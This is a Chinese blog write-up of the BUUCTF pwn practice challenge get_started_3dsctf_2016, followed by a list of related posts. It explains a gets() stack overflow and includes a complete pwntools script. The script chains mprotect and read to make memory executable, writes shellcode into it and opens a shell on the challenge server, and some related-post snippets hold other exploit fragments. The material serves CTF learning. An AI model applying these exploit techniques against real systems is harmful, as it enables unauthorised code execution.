BUU刷题-Pwn-get_started_3dsctf_2016

最新推荐文章于 2024-07-07 17:28:09 发布
原创 最新推荐文章于 2024-07-07 17:28:09 发布 · 117 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

解题思路:

泄露或修改内存数据:

  1. 堆地址:无需
  2. 栈地址:无需
  3. libc地址:无需
  4. BSS段地址:无需
    劫持程序执行流程:[[ret2shellcode(栈溢出执行shellcode)]]
    获得shell或flag:[[利用shellcode获得shell]]
学到的知识:

[[mprotect函数(运行内存权限修改)]]

题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file get_started_3dsctf_2016 
get_started_3dsctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, not stripped
                                                                                                                     
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=get_started_3dsctf_2016 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified    Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   1991) Symbols     No    0   0get_started_3dsctf_2016

libc版本:
wp借鉴:(22条消息) [BUUCTF]PWN11——get_started_3dsctf_2016_Angel~Yan的博客-CSDN博客_get_started_3dsctf_2016

核心伪代码分析:

存在利用的的代码:

void __cdecl get_flag(int a1, int a2)
{
  int v2; // esi
  unsigned __int8 v3; // al
  int v4; // ecx
  unsigned __int8 v5; // al

  if ( a1 == 814536271 && a2 == 425138641 )
  {
    v2 = fopen("flag.txt", "rt");
    v3 = getc(v2);
    if ( v3 != 255 )
    {
      v4 = (char)v3;
      do
      {
        putchar(v4);
        v5 = getc(v2);
        v4 = (char)v5;
      }
      while ( v5 != 255 );
    }
    fclose(v2);
  }
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[56]; // [esp+4h] [ebp-38h] BYREF

  printf("Qual a palavrinha magica? ", v4[0]);
  gets(v4);
  return 0;
}
分析:

本地打法:
此题目有个后门函数get_flag(int a1, int a2),在本地创建flag.txt,就可以利用栈溢出泄露flag,地址利用0x80489B8可以绕过if从而成功,因为if的条件无法满足所以只有绕过才可以。(但打远程时无用)

远程打法:
利用栈溢出开启某一个空白内存的可执行权限,将shellcode写入并执行即可获得主机权限。
利用mprotect函数开启可执行权限(指定的内存区间必须包含整个内存页(4K),起始地址 start 必须是一个内存页的起始地址,并且区间长度 len 必须是页大小的整数倍,不然无法修改权限)
再利用read函数写入shellcode,并执行。
所以栈的结构应该布置成

esp->mprotect_addr
	 return1_addr
	 arg_1
	 arg_2
	 arg_3
	 read_addr
	 return2_addr
	 arg_1
	 arg_2
	 arg_3
	 shellcode_addr

执行完mprotect函数后,esp指向return_addr无法执行下一个有参数的函数(因为无法传参)所以必须将esp指向read_addr,可以将return1_addr设置成pop…pop…pop…ret的地址。执行完后就可以将esp指向read_addr,写入shellcode。
return2_addr同样可以将esp指向shellcode_addr,从而获得主机权限。

脚本:
from pwn import *
context(log_level='debug',arch='i386',os='linux')
elf = ELF('./get_started_3dsctf_2016')

pwnfile='./get_started_3dsctf_2016'
#sh=process(pwnfile)
sh=remote('node4.buuoj.cn',27051)

pop3_ret = 0x804951D

mem_addr = 0x80EB000
mem_size = 0x1000    
mem_proc = 0x7 #开启所有权限      

mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']


payload  = b'A' * 0x38
payload += p32(mprotect_addr)
payload += p32(pop3_ret) 

payload += p32(mem_addr) 
payload += p32(mem_size)  
payload += p32(mem_proc)   
payload += p32(read_addr)
payload += p32(pop3_ret)  

payload += p32(0)     
payload += p32(mem_addr)   
payload += p32(0x100) 

payload += p32(mem_addr)   

#gdb.attach(sh)
pause()
sh.sendline(payload)


payload = asm(shellcraft.sh()) 

sh.sendline(payload)

sh.interactive()
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 269
目截图
BUUCTF - PWNget_started_3dsctf_2016
古月浪子的博客
03-25 1622
checksec一下,可以栈溢出 IDA打开看看,一个很普通的栈溢出漏洞,有后门函数,应该说是一道非常简单的了 但是,本地打通非常容易,可是靶机打不通 =_= 于是乎,换个方法,利用mprotect函数修改bss段为rwx,写入shellcode跳过去执行 from pwn import * from LibcSearcher import * context.os='linux' con...
BUUCTF(Pwn)get_started_3dsctf_2016
半岛铁盒的博客
03-27 408
from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 exit_addr = 0x0804E6A0 payload = 'a'* 0x38 + p32(get_flag_addr) + p32(exit_addr)+ p32(a1) + p32(a2) p.sendline(pay..
BUUCTF pwn——get_started_3dsctf_2016
CNS-Enterprise BCC-1701-J
04-01 167
BUUCTF 做练习
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 420
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个有些不同,看看调用函数的汇编 该没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 741
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1131
利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUU-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
3. **分析操作码**:理解WASM指令集,识别关键操作,比如内存访问、算术运算、条件判断等。 4. **跟踪数据流**:追踪变量的分配和使用,找出可能的解密或计算过程。 5. **交互调试**:如果可能,使用像Emscripten...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 568
这道和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1677
目录目分析漏洞利用Exp 目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
pwn3dsctf2016_get_started
Nothing
12-12 323
例行检查 file一下,发现是静态连接的,还没有Pie。 分析程序发现是简单栈溢出,还有一个get_flag函数?于是直接返回到get_flag函数执行,但是远程没有打通,然后试了下本地可以打通,然后猜测可能是远程环境部署错了,没有flag.txt文件? 然后试试别的方法。 由于是静态链接里面函数还是很多的。 1.mprotect,修改某地址为rwx,随后写入shellcode,然后getshel...
buuctf get_started_3dsctf_2016
carol2358的博客
04-09 503
先checksec 这道打远程需要改变内存权限,需要用到mprotec,这道里也是有这个函数的 这道有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。 padding为0x38 大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传...
BUUCTF get_started_3dsctf_2016
最新发布
zwb2603096342的博客
07-07 1549
mprotect的运用
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 606
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
get_started_3dsctf_2016BUUCTF】(两种解法)
qq_41696518的博客
08-27 1699
get_started_3dsctf_2016
BUUCTF-PWN】12-get_started_3dsctf_2016
燕麦葡萄干的博客
07-05 1413
垃圾数据–>mprotect函数地址–>三个连续的pop地址–>.got.plt表起始地址–>内存长度–>内存权限–>read函数–>三个连续的pop地址–>read函数的三个参数–> .got.plt表的起始位置。其中gets()函数存在栈溢出,溢出距离为0x38,这里是使用的esp寻址,属于外平栈,不需要覆盖ebp的四个字节。第二种是直接在IDA中查找,crtl+s调出程序的段表,这里还不太清楚怎么去选择可用的程序段,看很多博客都是直接用的.got.plt的起始位置。
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 413
这是一道pwnable第二模块的目 这道开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
pwn BUUCTF第五空间决赛pwn5
doudoudedi
09-29 1010
emem今天也是水的一天阿哈哈看了一个第五空间决赛的pwn5发现很简单诶 这估计有很多的思路因为 明显的格式化字符串漏洞可以改写got表的地址,可以打印地址的内容所以 我就讲2个 它是随机数和你输入的数相同就会给你一个后门所以就可以泄露出给你的随机数然后输入进去就行了 我这里写一个 这个函数我们把其改为system函数地址然后输入’/bin/sh\x00’ 就行了很简单啊啊 from pw...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值